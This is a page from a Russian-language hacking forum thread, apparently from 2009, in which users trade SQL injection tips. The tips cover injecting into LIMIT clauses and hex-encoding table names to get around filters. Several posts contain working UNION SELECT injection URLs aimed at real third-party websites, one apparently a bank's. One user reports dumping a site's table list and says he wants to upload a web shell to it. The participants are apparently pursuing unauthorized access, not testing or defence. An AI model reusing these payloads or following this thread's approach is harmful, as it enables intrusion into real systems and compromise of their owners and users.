HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4691  
Старый 16.01.2009, 18:52
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

не по сабжу

Цитата:
Сообщение от big_BRAT  
по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.
 
Ответить с цитированием

  #4692  
Старый 16.01.2009, 18:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от geezer.code  
инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.
Только не после ордера
Цитата:
ORDER BY p.post_time DESC LIMIT -3, 3
 
Ответить с цитированием

  #4693  
Старый 16.01.2009, 20:01
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?
 
Ответить с цитированием

  #4694  
Старый 16.01.2009, 20:18
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Qam Инъекция в лимите после ORDER BY невозможна, я думал ответ на твой вопрос дан
 
Ответить с цитированием

  #4695  
Старый 16.01.2009, 20:22
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 Qam
Цитата:
https://forum.antichat.ru/showthread.php?t=56446
 
Ответить с цитированием

  #4696  
Старый 16.01.2009, 20:23
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
По умолчанию

Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
 
Ответить с цитированием

  #4697  
Старый 16.01.2009, 20:29
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от MirA  
Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира"

По теме: дать ссылку
 
Ответить с цитированием

  #4698  
Старый 16.01.2009, 20:59
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
По умолчанию

http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13+--+
 
Ответить с цитированием

  #4699  
Старый 16.01.2009, 21:00
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
Код:
SELECT HEX('tablename')
и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D
 
Ответить с цитированием

  #4700  
Старый 16.01.2009, 21:02
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
По умолчанию

помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/

Не могу понять где здесь таблицы форума???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.